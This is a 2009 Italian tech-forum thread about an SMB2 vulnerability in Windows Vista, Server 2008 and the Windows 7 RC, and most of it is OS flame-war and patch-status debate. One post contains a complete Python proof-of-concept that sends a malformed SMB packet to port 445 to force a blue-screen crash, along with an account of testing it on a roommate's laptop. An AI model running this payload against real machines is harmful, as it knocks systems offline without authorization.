View Full Version : Windows 7, una falla ancor prima di salpare
Redazione di Hardware Upg
09-09-2009, 12:35
Link alla notizia: http://www.hwupgrade.it/news/sicurezza/windows-7-una-falla-ancor-prima-di-salpare_30048.html
Microsoft, indaffarata per preparare al meglio il lancio del prossimo sistema operativo, oramai imminente, si vede costretta a lavorare per sistemare una falla
Click sul link per visualizzare la notizia.
Vabè dai... su milioni di righe di codici sono andati a pescare l'ago nel pagliaio, ci può stare, e non penso ci voglia molto a risolverlo.
Inoltre se il problema era già presente anche su Vista che è in circolazione da anni, significa che c'è voluto non poco zelo per riuscire a trovarlo.
Liquid.Tension
09-09-2009, 12:45
Meglio prima che dopo...
Scatenate l'inferno... :)
potrebbe essere questo il motivo per cui mi è già capitato 2 volte che mi sono ritrovato il pc riavviato in seguito ad un errore grave...
MiKeLezZ
09-09-2009, 12:47
SMB2 c'è anche in Vista e Server 2008
Quindi? Perchè non vengono citati?
Dai primi test sembrerebbe che solo Windows 7 RC, Windows Server 2008 SP2, Windows Server 2008 R2 RC, Windows Vista SP1 siano vulnerabili.
Windows 7 RTM sembrerebbe non soffrire di questo bug
ombra666
09-09-2009, 12:50
SMB2 c'è anche in Vista e Server 2008
Quindi? Perchè non vengono citati?
il colosso di Redmond si vede costretto ad ovviare anche ad una importante falla di sicurezza presente sia in Windows Vista sia in 7
manca solo il riferimento a server 2k8
...un software in RTM con una falla?!...inaudito...
...ciao Andrea...
mafferri
09-09-2009, 12:53
sarà dovuto a questo i riavvi inaspettati del mio mediacenter?:rolleyes: :rolleyes:
ShadowThrone
09-09-2009, 12:55
esce il 22 ottobre, oggi è il 9, ce la faranno a correggere questo bug...
...un software in RTM con una falla?!...inaudito...
...ciao Andrea...Ma se le falle vengono sempre scoperte su tutti i sistemi anche in final release e gia' in vendita da anni e' inaudito scovare una falla in una RTM version tantoche' WIn7 non e' nemmeno ancora in vendita a tutti ed ha tutto il tempo per essere sistemato prima del 22 ottobre ovvero data del rilascio ufficiale al Mondo ?
Io credo che non sai cosa dici o meglio lo sai ma forse essendo tu uno user di altro Os te ne esci con queste solite sparate per sminuire windows :D
Microsoft non si smentisce mai, sembra quasi che non li paghi i Buxfixer :asd:
Microsoft non si smentisce mai, sembra quasi che non li paghi i Buxfixer :asd:eccone un altro :asd: Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere :) parla da fine ottobre 2009
ombra666
09-09-2009, 13:05
eccone un altro Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere parla da fine ottobre 2009
la falla è presente anche in vista
eccone un altro :asd: Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere :) parla da fine ottobre 2009
siete fanboy.
1-non acquisterei (leggi, utilizzerei) mai un prodotto MS
2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta :asd:
...un software in RTM con una falla?!...inaudito...
...ciao Andrea...
Ciao a tti,
Si certo, e' abberrante, ma nulla di nuovo e' un prodotto di Bill..... :D
Lontanissimo anni luce dal O.S. di Cupertino... :O
Bellissimo lo "Snow Leopard"... :cool:
Ecco Bill - Ballmer
:cry: - :boh:
Ecco Bill - Ballmer
:friend: - dai meglio un :burp:
Ps: Ecco i preparativi stavano andando lisci, cosi' bene... e to'.... :asd:
Ciao e alla prossima
Nio04
infatti io non capisco..."una falla ancor prima di uscire..." sembra quasi che abbiate iniziato a studiare i sistemi operativi ieri... :D ma se le ha anche apple le falle...ancora windows xp le ha dopo anni...queste sono fesserie,pur sempre da risolvere,ma che non minano di certo un uso "normale" del sistema...come ha detto qualcuno è un ago nel pagliaio...
Ma se le falle vengono sempre scoperte su tutti i sistemi anche in final release e gia' in vendita da anni e' inaudito scovare una falla in una RTM version tantoche' WIn7 non e' nemmeno ancora in vendita a tutti ed ha tutto il tempo per essere sistemato prima del 22 ottobre ovvero data del rilascio ufficiale al Mondo ?
Io credo che non sai cosa dici o meglio lo sai ma forse essendo tu uno user di altro Os te ne esci con queste solite sparate per sminuire windows :D
...era sarcasmo...come il titolo della news altamente provocatorio...già i processi ad un SO ancora da rilasciare in via ufficiale...
...ciao Andrea...
siete fanboy.
1-non acquisterei (leggi, utilizzerei) mai un prodotto MS
2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta :asd:ma cosa interessa cosa userai e cosa acquisterai tu? che non usi Os microsoft lo si e' capito subito , basta vedere come hai commentato ovvero scrivendo fesserie fa fanboy della controparte per denigrare Windows7 pur se come ben sai non e' ancora uscito :asd:
Ci si dovrebbe lamentare solo e qualora Win7 fosse uscito ufficialmente ,l'utente lo avesse pagato e dopo 2 giorni gli si presentasse la falla, non ADESSO che Win7 non e' ancora uscito
State coi piedi per terra
siete fanboy.
1-non acquisterei (leggi, utilizzerei) mai un prodotto MS
2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta :asd:
vediamo di non scatenare flame ammonizione
Ciao a tti,
Si certo, e' abberrante, ma nulla di nuovo e' un prodotto di Bill..... :D
Lontanissimo anni luce dal O.S. di Cupertino... :O
Bellissimo lo "Snow Leopard"... :cool:
Ecco Bill - Ballmer
:cry: - :boh:
Ecco Bill - Ballmer
:friend: - dai meglio un :burp:
Ciao e alla prossima
Nio04
si fra 3 giorni con la speranza che non scateni ne flame ne os-war
Obelix-it
09-09-2009, 13:12
Io credo che non sai cosa dici o meglio lo sai ma forse essendo tu uno user di altro Os te ne esci con queste solite sparate per sminuire windows :D
Lui lo sa cosa, dice: si chiama 'sarcasmo', magari se guardi su un buon dizionario capisci di che cosa sta parlando. :D
Gia' che ci sei, cerca anche 'coda di paglia', che invece sembri avere tu..... :eek:
ma del resto una notizia non notizia come questa serve solo per far arrivare guerriglie di religione nei commenti
Erian Algard
09-09-2009, 13:14
siete fanboy.
1-non acquisterei (leggi, utilizzerei) mai un prodotto MS
2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta :asd:
Dato di fatto? E te che ne sai quanti ne trovano i tester. Sei forse uno di loro? :asd: bel lavoro nel caso :asd:
:rolleyes:
fraussantin
09-09-2009, 13:16
siete fanboy.
1-non acquisterei (leggi, utilizzerei) mai un prodotto MS
2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta :asd:
1:bravo peccato che per molti usi non esistano valide alternative.(un dual boot lo fano quasi tutti qualli che usano o linux o macos)(se viani al mio paese un negozio sd , unico rivenditore mac ,usa un mac pero dove sopra ha messo vista perche i programmi sd non fanno su mac , detto da lui)
2:in primis gli hacher :asd:
@Nio04: ehm..forse ti è sfuggita la notizia che la casa di Cupertino è già al lavoro per sanare dei bug del "fantasmagoricosupermegaultraiper" snow leopard.. Mi sa che dai dei fanboy a noi (premetto: uso win, mac e linux indistintamente..quindi non sono molto fanboy per nessuna casa..), ma anche tu non scherzi! ^^
Detto questo, su technet (http://www.microsoft.com/technet/security/advisory/975497.mspx) viene detto che Win7 NON ne è afflitto..
Per il resto: non è la causa di riavvii di Windows Media Player, nè dovrebbe esserlo (ammesso che ms abbia pubblicato una cosa non vera, per non infangare il nuovo gioiello di casa) dei riavvii del computer, causando SOLO una BSOD (quindi, invece di riavviarsi, dovrebbe bloccarsi sulla schermata blu..e POI riavviarsi).
certo che fa strano che per esempio su win xp hanno continuato a risolvere bug gravi fino a ieri, bug che erano presenti dal giorno dell'uscita. tuttavia penso che alla fine sia abbastanza normale, l'unica difesa è avere un mercato con tre sistemi operativi diversi e più o meno equivalenti come quota di mercato, sia per server che per i desktop... almeno se qualche ragazzino trova un bug grave non mette il mondo in ginocchio...
ma cosa interessa cosa userai e cosa acquisterai tu? che non usi Os microsoft lo si e' capito subito , basta vedere come hai commentato ovvero scrivendo fesserie fa fanboy della controparte per denigrare Windows7 pur se come ben sai non e' ancora uscito :asd:
Ci si dovrebbe lamentare solo e qualora Win7 fosse uscito ufficialmente ,l'utente lo avesse pagato e dopo 2 giorni gli si presentasse la falla, non ADESSO che Win7 non e' ancora uscito
State coi piedi per terra
come puoi leggere tu hai presupposo che utilizzassi Winsozz
eccone un altro :asd: Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere :) parla da fine ottobre 2009
inoltre il problema non è del prima o del dopo, iol problema è che se non fosse stato segnalato da una persona esterna il big, sarebbe stato sfruttato da chiunque senza che MS facesse nulla, in quel caso, molto probabilmente, il bug si sarebbe presentato dopo l'uscita del SO.
ok
Microsoft: Windows 7 not affected by latest flaw http://bit.ly/1vyz6I
ombra666
09-09-2009, 13:22
ora il colosso di Redmond si vede costretto ad ovviare anche ad una importante falla di sicurezza presente sia in Windows Vista sia in 7.
ma le leggete le news almeno? :asd:
sto problema c'è pure su vista, che se non sbaglio è uscito da un po'.
e quindi? non esiste il SO perfetto....
Dato di fatto? E te che ne sai quanti ne trovano i tester. Sei forse uno di loro? :asd: bel lavoro nel caso :asd:
:rolleyes:
le falle trovato vengono sempre comunicate, questo non è il caso. Inoltre basta vedere quanti virus ci sono per capire che i tester sono praticamente inesistenti.
Detto questo basta OT Non mi interessa farvi cambiare opinione su Windows, ne tantomeno mi interessa quale sia il miglior OS, ognuno usa l'OS che preferisce, questi flame lasciano il tempo che trovano.
come puoi leggere tu hai presupposo che utilizzassi Winsozz
inoltre il problema non è del prima o del dopo, iol problema è che se non fosse stato segnalato da una persona esterna il big, sarebbe stato sfruttato da chiunque senza che MS facesse nulla, in quel caso, molto probabilmente, il bug si sarebbe presentato dopo l'uscita del SO.le beta relase , le RC e le RTM vengono distribuite apposta da Microsoft prima della final release per scovare problemi e risolverli appunto prima del rilascio della versione definitiva finale il 22 ottobre 2009
Sono cose ovvie queste .
Altrimenti perche' adesso non mi fate l'elenco dei bugs che sono stati corretti su Win7 anche in tutte le beta distribuite fino a mesi fa?
che senso ha? ma dai
Quando uscira' la versione definitiva di Win7 ,la gente lo avra' pagato e dopo ad esempio subito dopo 7 giorni gli si prensentera' una falla allora ci sara' motivo di lamentarsi e criticare..e saro' il primo a dirlo ( perche' io non sono fanboy di niente ma solo obbiettivo) ..ma non adesso
martinez1983
09-09-2009, 13:25
Non mi sembra poi una falla così gravissima!!!(per giunta di un SO non ancora in vendita)
Ribadisco un concetto molto semplice a tutti....."non esiste sofwtare immune da bug"!!!
wannissimo
09-09-2009, 13:27
...per il rilascio penso che sarà tutto OK.....W7 gran bel sistema , una spanna sopra a Vista ma l'innovazione vera nel settore dei sistemi operativi arriverà con CHROME OS .....
Non esiste il sistema operativo PERFETTO. Esiste pero' un modo di lavorare e un etica morale che definiscono quale sia il sistema operativo migliore. Non scateniamo il terrore per niente dai.
Nulla di nuovo e nulla di particolare, nessun OS è privo di Bug.
Windows 2000 e XP non sono invece a rischio, vista il mancato supporto di SMB2.
Detta così sembra quasi una cosa buona, ma è un po' come dire che se non hai gli specchietti retrovisori nell'auto non te li possono rompere, però è anche vero che non puoi vedere dietro, parcheggiare, etc...
pabloski
09-09-2009, 13:28
Falla del piffero, che probabilità ci sono che possa essere usata? Quante persone che hanno win 7 non sono dietro un router/firewall? E anche quando, che interesse può avere un hacker a farti comparire una schermata blu? E anche quando ciò avvenga, quale sarebbe il danno?
è l'exploit a generare un bsod, ma non è detto che non ci sia il modo per usare la vulnerabilità per infettare le macchine
poi questo tipo di falla permette l'infezione tramite lan e lì non ci sono firewall che tengano, basta una macchina infettata e in 10 minuti ti ritrovi infettata l'intera rete.....un hacker può avere molto interesse in questo genere di cose, le informazioni sono la nuova moneta del mondo
comunque il problema è che purtroppo dipendiamo per moltissime cose da windows e questo è sbagliato, bisogna diversificare e no non è possibile che i bancomat usino windows ( del resto versioni che vanno da nt4 a 2000, quindi roba vecchia e non patchata )
in ogni caso il vero problema sono le vulnerabilità di cui si sa poco e i cui exploit vengono venduti sul mercato nero
forse il titolo influenza i vostri pareri, ma nella news c'è scritto che la falla è presente (come fatto notare per ben due volte da altri user) anche in Windows Vista, questo dimostra come non centri beta, alpha, pre-release, OS acerbo e quante altre motivazioni trovate.
Commento # 26 di: deepdark
Falla del piffero, che probabilità ci sono che possa essere usata? Quante persone che hanno win 7 non sono dietro un router/firewall? E anche quando, che interesse può avere un hacker a farti comparire una schermata blu? E anche quando ciò avvenga, quale sarebbe il danno?
Insomma, si parla di nulla. Tra l'altro il s.o. non è ancora uscito ed è stato distribuito proprio per questo, un motivo ci sarà no?
_______________________________________________________
Ti ricordano niente SASSER e BLASTER ? Prova tu a lavorare con un sistema che si riavvia da solo ogni 2 x 3. La falla non e' una cosa da poco, ma se viene risolta VELOCEMENTE, la notizia diventera' storia molto velocemente.
Sammy Jankis
09-09-2009, 13:32
Windows 7, una falla ancor prima di salpare........redattore sospeso per 3 gg per principio di flame :)
è l'exploit a generare un bsod, ma non è detto che non ci sia il modo per usare la vulnerabilità per infettare le macchine
poi questo tipo di falla permette l'infezione tramite lan e lì non ci sono firewall che tengano, basta una macchina infettata e in 10 minuti ti ritrovi infettata l'intera rete.....un hacker può avere molto interesse in questo genere di cose, le informazioni sono la nuova moneta del mondo
comunque il problema è che purtroppo dipendiamo per moltissime cose da windows e questo è sbagliato, bisogna diversificare e no non è possibile che i bancomat usino windows ( del resto versioni che vanno da nt4 a 2000, quindi roba vecchia e non patchata )
in ogni caso il vero problema sono le vulnerabilità di cui si sa poco e i cui exploit vengono venduti sul mercato nero
si ok ma chi lavora ora con ad esempio 30 computer in lan e Win7 come Os di lavoro che non e' ancora uscito in final release ?
nessuno lavora con un Os RC.Quando WIn7 sara' uscito e la gente lo comprera' ed usera' per lavorare questa falla sara' risolta
Windows 7, una falla ancor prima di salpare........redattore sospeso per 3 gg per principio di flame :)
...quoto...inutile dire di voler combattere i flame quando si rilasciano titoli del genere...sarebbe ora di finirla...
...quotate se condividete...
...ciao Andrea...
Pier de Notrix
09-09-2009, 13:44
Raga, ma a nessuno di quelli che tra voi stanno testando Windows 7 è capitato che crashasse il sistema e al riavvio il desktop fosse scomparso?
Allora la notizia doveva titolarsi:
"Trovata falla di sicurezza in Windows VIsta e Win 2008"
E poi nell'articolo dire che il problema c'è anceh su un prodotto ceh deve ancora uscire
però fa molto più scoop e genera moto trollismo titolare così. A volte mi chiedo con che testa mettano certi tiolo. Forse fanno apposta. Forse che i moderatori non abbiano nulla da fare?
forse il titolo influenza i vostri pareri, ma nella news c'è scritto che la falla è presente (come fatto notare per ben due volte da altri user) anche in Windows Vista, questo dimostra come non centri beta, alpha, pre-release, OS acerbo e quante altre motivazioni trovate.Al di là della falla che si può trovare anche in Vista, hai fatto dei commenti che mancano di alcuni importanti presupposti "scientifici".
Il fatto è che non hai citato né fonti né dati di alcun tipo, hai solo detto "spannometricamente" che la maggior parte dei bug li trova gente esterna a Microsoft, dicendo che "è un dato di fatto" (sic). Ti si è già detto che questo è impossibile da verificare, quindi commenti del genere lasciano il tempo che trovano.
Nello specifico c'è in fondo da rallegrarsi, perché se un bug "da news" non fa altro che mostrare un BSOD, allora non siamo messi affatto male, anzi. E ci sono voluti 2 anni di Vista per trovare la falla, segno che non era affatto facile da ravvisare.
Se tutti gli altri OS avessero puntati addosso tutti gli occhi che ha Microsoft davvero non so quanto ne uscirebbero sicuri agli occhi della gente... ma non mi pronuncio. Solo, non facciamo passare la Microsoft per una manica di incompetenti.
...quoto...inutile dire di voler combattere i flame quando si rilasciano titoli del genere...sarebbe ora di finirla...
...quotate se condividete...Lungi da me mettermi in polemica con la redazione, ma in effetti una flame war con titoli del genere forse non è scontata, però mi pare almeno più facile.
Forse si sarebbe scatenata comunque, ma questo è un sito serio e possiamo fare a meno di titoli "attira-click". Probabilmente un titolo come "Bug in SMB2, BSOD per Windows 2008, Vista e Seven" non avrebbe attratto la stessa quantità di gente.
le falle trovato vengono sempre comunicate, questo non è il caso. Inoltre basta vedere quanti virus ci sono per capire che i tester sono praticamente inesistenti.
Detto questo basta OT Non mi interessa farvi cambiare opinione su Windows, ne tantomeno mi interessa quale sia il miglior OS, ognuno usa l'OS che preferisce, questi flame lasciano il tempo che trovano.quindi il fatto che hacker o criminali informatici compilino codice per sviluppare programmini con funzionalita' malevola ( trojan spyware,keylogger etc) per l'Os windows significa che Windows fa schifo?
No, significa che compilano software con funzionalita' malevola perche' hanno appunto interesse a compilare questo genere di software per Windows e non per Linux ad esempio che ha una percentuale di home user che lo usa ridicola dove quindi questi software avrebbero un impatto ridicolo .Il criminale o l'hacker agisce e sta addosso sempre all'Os su cui potrebbe poi ricavarne il maggior tornaconto .Sta poi a te non far installare questi software -baggianate sul sistema
mache te lo dico a fa'
siete fanboy.
1-non acquisterei (leggi, utilizzerei) mai un prodotto MS
grazie dell'informazione! Utilissima, a tutta la community. Mettila in firma...
2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta :asd:
questa affermazione è suffragata da qualche argomentazione?
ok
Microsoft: Windows 7 not affected by latest flaw http://bit.ly/1vyz6I
Si appunto, fa piacere averlo scritto al secondo post e tutti l'hanno sorvolato :D :asd:
le falle trovato vengono sempre comunicate, questo non è il caso.
Questo significa che questa falla non era stata ancora scovata, vuol dire che non sanno lavorare? :rolleyes:
Inoltre basta vedere quanti virus ci sono per capire che i tester sono praticamente inesistenti.
Se ci sono 5000 falle (numero a caso) e col beta testing ne vengono trovate e corrette 4500 (numero a caso), nei mesi successivi al rilascio i cracker potrebbero creare 500 virus per sfruttare le falle rimanenti (che verranno corrette dopo con le patch). Questo significa che i tester sono inesistenti (pur avendo scovato 4500 falle), visto che 500 virus non sono pochi? :rolleyes:
mail9000it
09-09-2009, 14:07
eccone un altro :asd: Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere :) parla da fine ottobre 2009
Curtis
Prima di tutto molti dei commenti hai quali hai risposto erano chiaramente ironici e non si capisce perchè tu abbia replicato con tanta violenza.
In secondo luogo forse sei tu che non sei ben informato e che deve moderare quello che scrive.
(mi riferisco ai primi post quelli successivi non li ho letti)
Sai che RTM sta per Release to manufacturing (Versione per la produzione)?
e che indica che è la versione FINALE del SO che viene inviato alle fonderie (non so il nome esatto) che masterizzano e inscatolano i CD per la vendita.
Sei al corrente che la RTM di Windows 7 è stata UFFICIALMENTE rilasciata da Microsoft ed è accessibile ai possessori di un account TechNet Plus e MSDN dal 14/08/2009.
Quindi test e commenti sulla RTM di Windows 7 sono perfettamente possibili ora senza dover aspettare il 22 Ottobre.
Ne consegue che qualunque patch o modifica successiva deve essere scaricata dal sito con Windows Update 30 secondi dopo aver installato il sistema operativo.
Una prassi normale al giorno d'oggi ma che francamente non mi piace.
Inoltre come già segnalato il bug in oggetto era presente anche in Vista e non occorre molto a controllare se su Win7RTM è presente un bug già visto e conosciuto su vista.
CIAO
Sono convinto che anche i tanto blasonati Linux e Mac OS X (che comunque considero SO di altissimo livello, così come Windows 7) avranno un'immensità di falle di sicurezza.
La differenza è che su Windows si concentrano tutti gli attacchi e l'attenzione generale per il semplice fatto che è il più diffuso.
L'importante comunque è la rapidità con la quale si rilasciano patch critiche.
teodelux99
09-09-2009, 14:10
perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?
sniperspa
09-09-2009, 14:15
mica tanto ancora prima di salpare...è salpato da mesi ormai...
Chiunque con scopi malevoli avrebbe avuto parecchio tempo per cercare falle...
Sammy Jankis
09-09-2009, 14:15
perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?
OT: Per lo stesso motivo per cui nei film e telefilm USA il mercato è così diviso: 70% Apple, 30% PC (esclusivamente DELL) FINE OT.
P.S. per sdrammatizzare......:D
Simock85
09-09-2009, 14:17
Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?
# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.
La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.
Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.
Le versioni vulnerabili dei sistemi operativi, almeno stando ai primi test, le avevo scritte al secondo post :) Riguardo Windows 7, è vulnerabile solo la RC e non la RTM
genesi86
09-09-2009, 14:28
Non esiste un SO perfetto ed invulnerabile, xò esistono condizioni affinchè un SO sia + sicuro e - vulnerabile rispetto ad un altro SO. Purtroppo Windows essendo x ragioni commerciali un SO di tipo "close", ha solo tot selezionatissimi ing. ke sn autorizzati ad intervenire ed a kiudere le falle, quindi ci sono meno "occhi" ke vigilano e meno persone ke possono intervenire a correggere gli errori.
[Curtis
Prima di tutto molti dei commenti hai quali hai risposto erano chiaramente ironici e non si capisce perchè tu abbia replicato con tanta violenza.
In secondo luogo forse sei tu che non sei ben informato e che deve moderare quello che scrive.
(mi riferisco ai primi post quelli successivi non li ho letti)
Sai che RTM sta per Release to manufacturing (Versione per la produzione)?
e che indica che è la versione FINALE del SO che viene inviato alle fonderie (non so il nome esatto) che masterizzano e inscatolano i CD per la vendita.
Sei al corrente che la RTM di Windows 7 è stata UFFICIALMENTE rilasciata da Microsoft ed è accessibile ai possessori di un account TechNet Plus e MSDN dal 14/08/2009.
Quindi test e commenti sulla RTM di Windows 7 sono perfettamente possibili ora senza dover aspettare il 22 Ottobre.
Ne consegue che qualunque patch o modifica successiva deve essere scaricata dal sito con Windows Update 30 secondi dopo aver installato il sistema operativo.
Una prassi normale al giorno d'oggi ma che francamente non mi piace.
Inoltre come già segnalato il bug in oggetto era presente anche in Vista e non occorre molto a controllare se su Win7RTM è presente un bug già visto e conosciuto su vista.
CIAO
L'importante e' che quando uscira' la final release in vendita al pubblico e che la comprera' la falla sia corretta
perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?
perche' quando Apple rilascia un aggiornamento di sistema le cose che mette in risalto nelle news sui siti pubblici che motivano l'aggiornamento sono appunto gli aggiornamenti di stabilita' delle applicazioni ( strano perche' dovevano gia' essere stabili a sentire Apple ) mentre i security fix non vengono mai mostrati apposta per non far vedere di primo acchito le vulnerabilita' ai meno esperti che leggono le news e far cadere un mito
Se poi si va sul sito apple nella sezione Security issue ad ogni aggiornamento di OSx da ben 300MB circa ogni mese e mezzo si vede una lista di vulnerabilta' corrette che sembra un campo di battaglia
provare per credere
Questo significa che questa falla non era stata ancora scovata, vuol dire che non sanno lavorare? :rolleyes:
Se ci sono 5000 falle (numero a caso) e col beta testing ne vengono trovate e corrette 4500 (numero a caso), nei mesi successivi al rilascio i cracker potrebbero creare 500 virus per sfruttare le falle rimanenti (che verranno corrette dopo con le patch). Questo significa che i tester sono inesistenti (pur avendo scovato 4500 falle), visto che 500 virus non sono pochi? :rolleyes:Una falla di remote code execution ad esempio serve solo per essere sfruttata con apposito codice exploit per poi eventualmente far autoinstallare un malware
Una falla di questo tipo ha solo come fine il far autoinstallare malware di ogni genere sul sistema senza che l'utente ne sia al corrente ( poi come si sa prima che il malware effettivamente si installi deve passare anche il controllo dell'antivirus con la protezione permanente di sistema che lo blocca a priori )
Una falla di remote code execution ( le piu' gravi e che portano all'autoinstallazione di malware sul sistema) si sfrutta con codice exploit dedicato che il cracker crea apposta per sfruttare quella falla di memory corruption & remote arbitrary code execution e serve poi per far autoinstallare il malware , non e' un programmino malware che sfrutta la vulnerabilita', l'autoinstallazione di un programmino malware e' solo la conseguenza che porta lo sfruttamento di una tale vulnerabilita' con dedicato codice exploit
Ripeto
Confirmed: Windows 7 RTM not affected by reported zero-day flaw in SMB2. http://bit.ly/HHifR
mail9000it
09-09-2009, 14:34
Sono convinto che anche i tanto blasonati Linux e Mac OS X (che comunque considero SO di altissimo livello, così come Windows 7) avranno un'immensità di falle di sicurezza.
La differenza è che su Windows si concentrano tutti gli attacchi e l'attenzione per il semplice fatto che è il più diffuso.
Una delle differenze principali tra Linux e Windows è che in Linux le falle vengono chiuse in tempi molto brevi mentre Microsoft a volte si prende anche 6-8 mesi prima di pubblicare una patch.
In ogni caso Win7 è Vista2 (o VistaSP3 se preferite) e come molte delle release 2 di un SO sembra essere un ottimo prodotto. Abbastanza stabile e sicuramente meglio ottimizzato di Vista.
Oltre alla diffusione (sicuramente vero sui pc) uno dei motivi principali degli attacchi su Windows è stata la scelta iniziale di MS di integrare IE nel sistema operativo esponendo quindi il fianco a migliaia di potenziali falle di sicurezza (vedi IE6).
Questo errore dal punto di vista della sicurezza non è mai stato fatto da Linux & CO che ha sempre avuto una gestione di sicurezza molto migliore.
Inoltre ricorda che Win7 e Linux sono due cugini molto bastardi perchè hanno Unix come lontano (per Win) antenato comune. XP è stato il frutto della fusione della linea Win95-98-ME con la linea WinNT-2000.
Con un po di archeologia del software non è difficile scovare che le prime versioni di Windows NT erano basate su una struttura Unix.
MA in effetti stiamo andando troppo indietro nella storia.
CIAO
PS. Quando si parla di Server i numeri cambiano parecchio e il rapporto tra le principali versioni di Unix/Linux e Windows cala di parecchio. Non ho dati corretti ma personalmente li vedo al 50% o con maggioranza Unix.
http://www.tomshw.it/news.php?newsid=19323
La falla è stata chiusa da Microsoft e già nella versione RTM di Win7 NON c'è più.
Ma possibile che per ogni inezia si debba sempre scatenare un putiferio?
Ovvio che essendo MS tanto famosa ed avendo una posizione sul mercato che definire predominante è più una barzelletta che un eufemismo (sarebbe meglio dire che loro sono il mercato) li rende i bersagli di ogni tipo di attacco possibile su scala Planetaria (prima o poi anche gli omini verdi se la prenderanno con MS) il risultato è che ogni difetto viene sistematicamente trovato.
Tutto ciò che per molti sembra una tragedia a mio parere è invece un pregio poichè solitamente i problemi scoperti vengono sistemati in un tempo congruo con l'importanza del bug, facendo si che diventi sempre più stabile il sistema, d'altra parte sistemi perfetti non esistono finchè non si riuscirà a creare una vera IA in grado di evolversi; un SO che è un programma non potrà mai battere l'inventiva dell'uomo nel creare nuovi attacchi, non presi in considerazione dai programmatori.
Una delle differenze principali tra Linux e Windows è che in Linux le falle vengono chiuse in tempi molto brevi mentre Microsoft a volte si prende anche 6-8 mesi prima di pubblicare una patch.
.quando microsoft scopre che ci sono falle di vulnerabilita' critiche su Windows in the Wild e che portano con apposito codice exploit per sfruttarle all'autoinstallazione di programmini malware rilascia entro brevissimo tempo le patch con aggiornamento straordinario
non hoi mai viso Microsoft tenere aperte per 8 mesi come hai scritto falle critiche di cui sopra senza patcharle
Collision
09-09-2009, 14:44
Anche la redazione però ci mette del suo eh! :stordita:
Notizia fuorviante, inesatta che serve solo a far illuminare i soliti spammoni!
Liquid.Tension
09-09-2009, 14:44
OT: Per lo stesso motivo per cui nei film e telefilm USA il mercato è così diviso: 70% Apple, 30% PC (esclusivamente DELL) FINE OT.
P.S. per sdrammatizzare......:D
USA? Ti sei forse perso le ultime stagioni delle Iene? 90% Apple, 10% di prodotti non riconoscibili in quanto marchi oscurati, al contrario della apple, con la mela sempre in primo piano, sarà un caso:D ?
gianni1879
09-09-2009, 14:44
Le versioni vulnerabili dei sistemi operativi, almeno stando ai primi test, le avevo scritte al secondo post :) Riguardo Windows 7, è vulnerabile solo la RC e non la RTM
mi sa che continuano a non leggere...
